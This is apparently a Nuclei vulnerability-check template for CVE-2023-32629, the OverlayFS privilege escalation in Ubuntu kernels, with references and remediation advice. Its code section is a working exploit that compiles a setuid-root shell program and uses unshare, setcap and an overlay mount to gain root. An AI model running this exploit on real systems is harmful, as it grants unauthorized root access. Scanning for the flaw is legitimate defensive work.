id: CVE-2023-32629

info:
  name: GameOver(lay) - Local Privilege Escalation in Ubuntu Kernel
  author: princechaddha
  severity: high
  description: |
    A local privilege escalation vulnerability has been discovered in the OverlayFS module of the Ubuntu kernel. This vulnerability could allow an attacker with local access to escalate their privileges, potentially gaining root-like access to the system.
  reference:
    - http://packetstormsecurity.com/files/174577/Kernel-Live-Patch-Security-Notice-LSN-0097-1.html
    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-32629
    - https://lists.ubuntu.com/archives/kernel-team/2023-July/140920.html
    - https://ubuntu.com/security/notices/USN-6250-1
  remediation: |
    Apply the latest security patches and updates provided by Ubuntu to fix the vulnerability.
  classification:
    cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 7.8
    cve-id: CVE-2023-32629
    cwe-id: CWE-863
    cpe: cpe:2.3:o:canonical:ubuntu_linux:23.04:*:*:*:*:*:*:*
    epss-score: 0.00042
  metadata:
    max-request: 2
    product: ubuntu_linux
    vendor: canonical
    verified: true
  tags: cve,cve2023,kernel,ubuntu,linux,privesc,local

self-contained: true
code:
  - engine:
      - sh
      - bash
    source: |
      id

  - engine:
      - sh
      - bash
    source: |
      cd /tmp
      echo '#include <stdio.h>\n#include <stdlib.h>\n#include <unistd.h>\n\nint main() {\n if (setuid(0) != 0) {\n fprintf(stderr, "\\x1b[31mFailed to set UID to 0.\\x1b[0m\\n");\n return 1;\n }\n\n printf("Entering \\x1b[36mprivileged\\x1b[0m shell...\\n");\n if (system("/bin/bash -p") == -1) {\n fprintf(stderr, "\\x1b[31mFailed to execute /bin/bash -p.\\x1b[0m\\n");\n return 1;\n }\n\n return 0;\n}' > test.c
      gcc test.c -o test
      unshare -rm sh -c "mkdir -p l u w m && cp test l/ && setcap cap_setuid+eip l/test && mount -t overlay overlay -o rw,lowerdir=l,upperdir=u,workdir=w m && touch m/test && u/test && id;"

    matchers:
      - type: dsl
        dsl:
          - '!contains(code_1_response, "(root)")'
          - 'contains(code_2_response, "(root)")'
        condition: and
# digest: 4a0a00473045022100cc36ed65fa01fe534699e2db622f418a3bb9470edd14eca1eba3138a2daebd4802207b1222e3e2dd3f5701821bab6d24e5cb9976223561e411372df8a2be3a71253c:922c64590222798bb761d5b6d8e72950